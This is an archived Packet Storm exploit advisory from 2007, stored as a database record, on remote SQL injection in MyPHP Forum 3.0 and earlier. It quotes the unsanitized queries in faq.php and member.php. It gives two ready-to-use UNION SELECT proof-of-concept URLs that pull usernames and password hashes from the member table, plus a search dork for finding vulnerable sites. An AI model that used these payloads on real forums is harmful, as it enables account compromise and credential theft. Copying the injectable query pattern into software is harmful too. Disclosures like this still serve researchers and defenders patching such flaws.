ID PACKETSTORM:62182 Type packetstorm Reporter x0kster Modified 2007-12-31T00:00:00
Description
`Name : MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability
Author : x0kster
Email : x0kster@gmail.com
Site : ihteam.net
Script Download : http://www.myphp.ws/
Date : 31/12/2007
Dork : "Powered by: MyPHP Forum"
Note:
For work, magic_quotes_gpc must be turned off on the server.
Usally the table prefix is 'nb'.
Sql injection in faq.php
<?php
//faq.php
[...]
$id = $_GET['id'];
if($action == "view" && !empty($id)) {
$result = mysql_query("SELECT * from $db_faq WHERE id='$id'") or die(mysql_error()); // <-- So miss a control :-D
$row = mysql_fetch_array($result);
$row[answer] = postify($row[answer]);
[...]
?>
So we can execute an sql injection thrught the bugged variable $id.
PoC:
http://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/*
Sql injection in member.php
<?php
//member.php
[...]
if($action == "viewpro") {
$member = $HTTP_GET_VARS['member'];
$query = mysql_query("SELECT * FROM $db_member WHERE username='$member'") or die(mysql_error());
[...]
?>
So $member variable isn't controlled so we can exploit it.
PoC:
http://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/*
`
{"type": "packetstorm", "published": "2007-12-31T00:00:00", "reporter": "x0kster", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "8563b9bc6e0aee8063f910c87450079e"}, {"key": "modified", "hash": "237551e94454f575fd46517d018198a2"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "237551e94454f575fd46517d018198a2"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "0cb4c85558d859ebf51c6382510cd384"}, {"key": "sourceData", "hash": "06f770dff793997319fc430f3af2b7ed"}, {"key": "sourceHref", "hash": "6e4d857dd28e1aee2707c2d334a2fa2e"}, {"key": "title", "hash": "f0fe14fa0cb9dee05fe2738d6e05ba35"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`Name : MyPHP Forum <= 3.0 (Final) Multiple Remote SQL Injection Vulnerability \nAuthor : x0kster \nEmail : x0kster@gmail.com \nSite : ihteam.net \nScript Download : http://www.myphp.ws/ \nDate : 31/12/2007 \nDork : \"Powered by: MyPHP Forum\" \n \nNote: \nFor work, magic_quotes_gpc must be turned off on the server. \nUsally the table prefix is 'nb'. \n \n \n \nSql injection in faq.php \n \n<?php \n//faq.php \n[...] \n$id = $_GET['id']; \nif($action == \"view\" && !empty($id)) { \n$result = mysql_query(\"SELECT * from $db_faq WHERE id='$id'\") or die(mysql_error()); // <-- So miss a control :-D \n$row = mysql_fetch_array($result); \n$row[answer] = postify($row[answer]); \n[...] \n?> \n \nSo we can execute an sql injection thrught the bugged variable $id. \n \nPoC: \n \nhttp://Site/faq.php?action=view&id=-1'+union+select+1,concat(username,0x3a,password),3+from+{table_prefix}_member+where+uid=1/* \n \n \n \n \nSql injection in member.php \n \n<?php \n//member.php \n[...] \nif($action == \"viewpro\") { \n$member = $HTTP_GET_VARS['member']; \n$query = mysql_query(\"SELECT * FROM $db_member WHERE username='$member'\") or die(mysql_error()); \n[...] \n?> \n \nSo $member variable isn't controlled so we can exploit it. \n \nPoC: \n \nhttp://Site/member.php?action=viewpro&member=-1'+union+select+1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19,20,21,22+from+{table_prefix}_member+where+uid=1/* \n`\n", "viewCount": 3, "history": [], "lastseen": "2016-11-03T10:26:16", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/62182/myphp-sql.txt.html", "sourceHref": "https://packetstormsecurity.com/files/download/62182/myphp-sql.txt", "title": "myphp-sql.txt", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-03T10:26:16", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:26:16", "rev": 2}, "vulnersScore": -0.1}, "references": [], "id": "PACKETSTORM:62182", "hash": "a11801d3f8b9cf93bf31e7edc7b030cb7be02555257f5ed57fc19c078eb4c58a", "edition": 1, "cvelist": [], "modified": "2007-12-31T00:00:00", "description": ""}
